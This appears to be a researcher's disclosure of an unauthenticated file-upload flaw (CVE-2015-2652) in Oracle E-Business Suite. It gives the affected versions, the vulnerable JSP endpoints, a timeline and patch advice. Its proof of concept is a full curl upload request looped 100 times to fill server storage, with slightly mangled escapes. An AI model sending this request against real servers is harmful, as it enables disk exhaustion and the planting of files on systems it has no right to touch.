During my regular penetration testing job, I unravelled an interesting
Unauthenticated File Upload 0-day vulnerability in Oracle E-Business Suite. This particular upload bug can be easily used to upload files on the web server, and an attacker can also flood the hard disk of the server, making it easier to leverage the vulnerability remotely.
Oracle released a Critical Patch Update containing security fixes for the Oracle E-Business Suite. This vulnerability is remotely exploitable without requiring any kind of authentication, i.e. it can be exploited over the network without the need for any valid username credentials.
Introduction
Oracle E-Business Suite is a fully integrated, comprehensive suite of business applications for the enterprise. Most organizations use Oracle E-Business for the following purposes:
- Customer Relationship Management
- Financial Management
- Human Capital Management
- Project Portfolio Management
- Advanced Procurement
- Supply Chain Management
- Service Management
Vulnerable Versions
Oracle E-Business Suite, version(s) 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4
Brief About the Bug
The unauthenticated upload vulnerability resides in the Oracle Marketing component. If you search Google for Oracle E-Business, you will find more than 30K unique results.
The file is uploaded into a table in the E-Business Suite database schema. The attacker, however, can use it to fill up the existing table space. The upload functionality allows the attacker to upload arbitrary file types (all executables) and also to execute the uploaded code.
Proof of Concept
Raw PoC for feeding files to the server:
for ($x=1; $x < 100; $x++):
curl -i -s -k -X 'POST'
-H 'Origin: http://Oracle-Application:Port'
-H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36'
-H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywS9xiTn7rP23Fori'
-H 'Referer: http://Oracle-Application:Port/OA_HTML/amsImageSelect.jsp'
-b 'JSESSIONID=6e66b3f234234234272c18909d2bca0c96bf7c.kdsnfksjdfn34rk32; PROD_pses=PROD%3DHcqumhXKzuUX0xNEIjoeFKu8hZ%7E; PROD=HcqumhXKzuUX0xNEIjoeFKu8hZ; oracle.uix=0^^GMT+4:00^p'
--data-binary $'------WebKitFormBoundarywS9xiTn7rP23ForirnContent-Disposition: form-data; name="type"rnrnFrn------WebKitFormBoundarywS9xiTn7rP23ForirnContent-Disposition: form-data; name="FileInput"; filename="Check.txt"rnContent-Type: text/plainrnrnrn------WebKitFormBoundarywS9xiTn7rP23ForirnContent-Disposition: form-data; name="fileId"rnrnnullrn------WebKitFormBoundarywS9xiTn7rP23ForirnContent-Disposition: form-data; name="url"rnrnrn------WebKitFormBoundarywS9xiTn7rP23Fori--rn'
'http://Oracle-Application:Port//OA_HTML/amsImageUpload.jsp?dummy=1&jttst0=6_22646%2C22646%2C-1%2C0%2C&jtfm0=&etfm1=&jfn=ZG01DFBB7BC079CDE282F4716CF2E5B140454CA599F18AD7A2CAD711D30D5FB60DF18438A1D10EB7BD7CF1370CF9D979BDA7&oas=ddrqZePQ82zVbJrUIG7jrw..&JSSetFunctionName=null&elemName=null'
end for;
Vulnerability Information
By using the following URLs, the attacker can upload files on the server:
http://ORACLE-WebServer:Port/OA_HTML/amsImageSelect.jsp
http://ORACLE-WebServer:Port/OA_HTML/amsImageUpload.jsp
For security reasons, we are not releasing the uploaded file path.
Timeline
- May 7, 2015: Identification of the vulnerability
- May 8, 2015: Reported to the Oracle Security Team
- May 12, 2015: Confirmed upload vulnerability in Oracle E-Business
- May 22, 2015: Upload vulnerability patched
- May 22, 2015: CPU scheduled for Critical Update
- July 13, 2015: CVE allocated — CVE-2015-2652
- July 14, 2015: Critical Update pushed
- July 15, 2015: Vulnerability made public
Mitigation
Update Oracle E-Business Suite to the latest version.
Oracle vulnerability reference and credit:
Oracle Critical Patch Update Advisory – July 2015
References
